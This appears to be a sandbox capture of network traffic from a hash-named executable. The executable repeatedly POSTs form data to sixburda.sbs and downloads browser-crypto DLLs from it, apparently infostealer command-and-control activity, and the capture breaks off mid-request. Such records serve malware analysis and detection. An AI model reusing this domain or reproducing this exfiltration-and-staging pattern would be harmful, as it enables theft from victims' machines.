Age: 1895
Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

142.250.187.227:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 01 Nov 2024 04:06:08 GMT
Expires: Fri, 01 Nov 2024 04:56:08 GMT
Cache-Control: public, max-age=3000
Age: 1892
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bgv3CPe03Ao5cTLvOglig4h0h7lko17x3DA58DBWef3WGUxFhn84ipEKKX4%2FCzjC5q49Ti2Gf3XkSWuvlQSfCMFRisCgBkBRZEEcziAE1VFkKzFMrSa7LQpbJjGO3dQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930e11c9193f4-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20520&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1026&delivery_rate=66288&cwnd=250&unsent_bytes=0&cid=f91c5cce83400f6a&ts=429&x=0"
DNS

41.249.124.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.249.124.192.in-addr.arpa

IN PTR

Response

41.249.124.192.in-addr.arpa

IN PTR

cloudproxy10041sucurinet
DNS

185.74.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.74.21.104.in-addr.arpa

IN PTR

Response
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFqsKxumJ9HUvBgDLpQ4clyyQKjRrIpLZnat%2BF7QXzrCkaNUey%2B8N1TbZL26%2BLDDfT2tDhSD84C2vivtkKeeHTyiei5O7iDdTGhLMj85ef7NCLNlgMtpQE49g2CT1zk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930e40ebc48cd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20141&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=67717&cwnd=250&unsent_bytes=0&cid=7e46e3c517dc5438&ts=440&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPTULkShpAFtJ4x0oB7SHX39LdmIZa%2F5WAwDF%2FQfXv7PJpEcxYYYLdt5BiA6kSj8MNWcfxQ%2BiRKfM8ZXioAJoF4lJkYJTPniqUA3igT%2B9KwkM8ZQhoxtW1%2BkiySK%2BaU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930e70a3393e0-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20866&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=66095&cwnd=244&unsent_bytes=0&cid=c36a11e694d553b6&ts=445&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJbuDIi4MRo9x0Dr71aWBZllrqAL7fx6y9b5r4rbArxCD2%2BiVpY074a3ijG%2Fhs5GnGlUKB%2BGXoD09WM4YCqXbwj%2F3kw3M5d2PFymyNTUlL4rmn3UbbPGgAu6dZe6nJo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930ea1eed60e7-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20794&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1102&delivery_rate=65813&cwnd=241&unsent_bytes=0&cid=403df075156e0e92&ts=445&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 4853
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6B70qZu4J35cfz0b0HDtx5ubAR4oUeWADwYBqqfgeabtywpwb6S80d8DMxkaZqALlZGfkKimhwxIxcGvgWA01zE7Y%2BgZPddRCa0Gt4DM9LsOrdD%2Ba2GyduLJtx6qr6k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930ee68de94c3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=21738&sent=4&recv=10&lost=0&retrans=0&sent_bytes=115&recv_bytes=5653&delivery_rate=60677&cwnd=250&unsent_bytes=0&cid=dc64563b4e71456b&ts=651&x=0"
GET

https://sixburda.sbs/sqlo.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /sqlo.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:43 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: keep-alive
Last-Modified: Wed, 30 Oct 2024 06:48:20 GMT
ETag: "6721d6b4-258600"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYzuMGsvbpGg5RCmxAKva%2BXHUFWXAh2wPaEnvA8An8wCG8Vf31J0dMoHxivyf3Infh0lWJ3vI3Q6WcBkQxD7IF3vyT9jmrV3MVuVSlqFE93YEXN3p%2FFQf2poMHtCTC8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db930f29cc3cd25-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=21762&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=686&delivery_rate=62893&cwnd=250&unsent_bytes=0&cid=e78f001747acb960&ts=97&x=0"
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
DNS

ogads-pa.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.googleapis.com

IN A

Response

ogads-pa.googleapis.com

IN A

216.58.213.10

ogads-pa.googleapis.com

IN A

216.58.201.106

ogads-pa.googleapis.com

IN A

142.250.187.234

ogads-pa.googleapis.com

IN A

142.250.200.42

ogads-pa.googleapis.com

IN A

142.250.187.202

ogads-pa.googleapis.com

IN A

216.58.212.234

ogads-pa.googleapis.com

IN A

142.250.200.10

ogads-pa.googleapis.com

IN A

142.250.179.234

ogads-pa.googleapis.com

IN A

172.217.169.74

ogads-pa.googleapis.com

IN A

142.250.180.10

ogads-pa.googleapis.com

IN A

172.217.16.234

ogads-pa.googleapis.com

IN A

216.58.204.74

ogads-pa.googleapis.com

IN A

142.250.178.10
DNS

apis.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

172.217.16.238
DNS

3.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.180.250.142.in-addr.arpa

IN PTR

Response

3.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f31e100net
DNS

234.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.179.250.142.in-addr.arpa

IN PTR

Response

234.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f101e100net
DNS

238.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.16.217.172.in-addr.arpa

IN PTR

Response

238.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f141e100net

238.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f14�I
DNS

10.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.213.58.216.in-addr.arpa

IN PTR

Response

10.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f101e100net

10.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f10�H
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.16.238
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

216.58.204.78
DNS

78.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.204.58.216.in-addr.arpa

IN PTR

Response

78.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f781e100net

78.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f14�H

78.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f14�H
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 1113
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PdZoO4QcUVdafidZA7w6eXnxUkSxtYe8x5qz4N%2B4Rvud8OR7eq06A65eBE1tqcDcqee2lWjfhqN1E2TCpyTeCYs%2BO3cqSwlGe4cUTRam1apv%2BZvFKQfDO9Q%2FI7F8pnY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db9312f1aec88a3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=23876&sent=5&recv=7&lost=0&retrans=0&sent_bytes=115&recv_bytes=1913&delivery_rate=62396&cwnd=250&unsent_bytes=0&cid=207cc66f709d21be&ts=731&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2B3%2FEZ%2FLAGK%2FmLPv9X1w1%2BsgYYP9JnRgSvNJUO99lxBJkKHN6RSaCkYg7mVflX6RUIbCTE6jEtZlE0upOzIbJ9T5Fkk97AmKKuctggsdqyVtXEtrkdLUXMxtsruSuCc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db93133e885407e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20914&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1207&delivery_rate=60933&cwnd=250&unsent_bytes=0&cid=f643fba5e3573f45&ts=680&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhfZH%2FgJcBJ11kFOuLDirCemGrYq5djHT4MWCKO%2BqBanerZLUa3AmzHGU49OVAGywXhxF%2Fmq3AYhsFdqhFogEK1kJqemFjnFu%2FkxtboNRbwG3WT8GpUz06NE%2Bp%2F7M%2FU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931393ed94142-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20593&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1207&delivery_rate=61486&cwnd=250&unsent_bytes=0&cid=c203b77b607e7af7&ts=701&x=0"
GET

https://sixburda.sbs/freebl3.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:55 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrCGAgHs4ADkijuYzC0cP2mzhuPHR5oeJMK1LIhVS%2FjiplUIox2yRyLhI2QydcH8wKzFG3z%2FfcepIGFnZQgQ20kKUMtLnMS6BWkQ9YJ6uykNIXamx0HDmGwSftlVNCM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db9313e2b207698-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=23081&sent=4&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=689&delivery_rate=59648&cwnd=250&unsent_bytes=0&cid=6bb4c70e2c7ef6e8&ts=135&x=0"
GET

https://sixburda.sbs/mozglue.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:55 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6315a9f4-94750"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7ZS8V9WYhkw%2FAQ1bYa07n9PpbKBjBgDTQygJPfLWeMzBN2NoVIvASVGOBWjWIiAL4PhlS1QkdJfrRumNUwKR3LTW%2FBSbkeURathqNKgB9R3D9DKJTKc%2FLebAOj1YCo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db9313feeb563a8-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20841&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=689&delivery_rate=66807&cwnd=249&unsent_bytes=0&cid=decb2652a2768ddb&ts=57&x=0"
GET

https://sixburda.sbs/msvcp140.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:56 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JDFEZtO3jBVU%2BYpMugTiDVGjbA2SHzdOOItm520y02oClRIcY%2B7bXOZZdeL%2BxxtW9t93a4AQpVN7UzBHd%2BRmuoVOaYbQ5sOHWP2Qfk0wRBWmv0zC9T8Mjp3w1F1uyg0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931419ee860de-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20957&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=690&delivery_rate=65121&cwnd=250&unsent_bytes=0&cid=f5c0c50edab4bb18&ts=83&x=0"
GET

https://sixburda.sbs/softokn3.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:56 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSYhJpRbXvIozjzBXTZRAcJrlJLT%2Ft02cNt9Pm89PP61le7NEy8ov7I4SDhjigd5lAIccCV1%2BGbhZo0fMzQATWJIEcMIK5pFo5oefC%2FGWHOCBQD0hhTsrPSgQ4u967g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931431ce8955d-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20513&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=690&delivery_rate=65065&cwnd=250&unsent_bytes=0&cid=fc34bc7f215dfea6&ts=80&x=0"
GET

https://sixburda.sbs/vcruntime140.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:56 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSDr8aK0hB8vvWyYkVFe%2BmFkPqGef8gPJSvmfyKg3WPFPKcmhrVlrGEydYc7NH0KAazQClC%2BpLY5nvkynll6Pe6zYyhRopFYE%2BtOYHBKvcKdkklxHIxnQgXjYMkIhOQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931448a26496d-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20416&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=694&delivery_rate=67809&cwnd=250&unsent_bytes=0&cid=b06b6378408c5aac&ts=80&x=0"
GET

https://sixburda.sbs/nss3.dll

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:56 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOPwzrYT5wc%2BKQVaMll1BtzuHESKrf5sl6sauJHf8SVPxuvVszNCTDp%2FBUITxE79YV5TDi1GIAD4FDPBgzy32kZHUj%2FZ4Kr2gck1SzeSp7wPOi7q8Nbo9e0bO1tan2Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db93145a8bccd9a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=20989&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=686&delivery_rate=65717&cwnd=250&unsent_bytes=0&cid=51ff6e51c426290b&ts=82&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: sixburda.sbs
Content-Length: 1025
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 01 Nov 2024 04:37:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r8%2F9p9GbnWZYUS16Ytip1h%2BJrZ22ez67fX7Oq3%2BJ6Gz%2FrHSxwMO4jmaNx4U0i5Qo3VIfe9quIGmv%2BTkE4LinLtptmzv7g5JFt7nI8rRNMJlz9MEw6dvIZ%2BwvQJzxW2k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8db931491bc76543-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=21088&sent=3&recv=7&lost=0&retrans=0&sent_bytes=115&recv_bytes=1825&delivery_rate=61963&cwnd=250&unsent_bytes=0&cid=2be86ef59f6cb11a&ts=678&x=0"
POST

https://sixburda.sbs/

9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe

Remote address:

104.21.74.185:443

Request

POST / HTTP/1.1
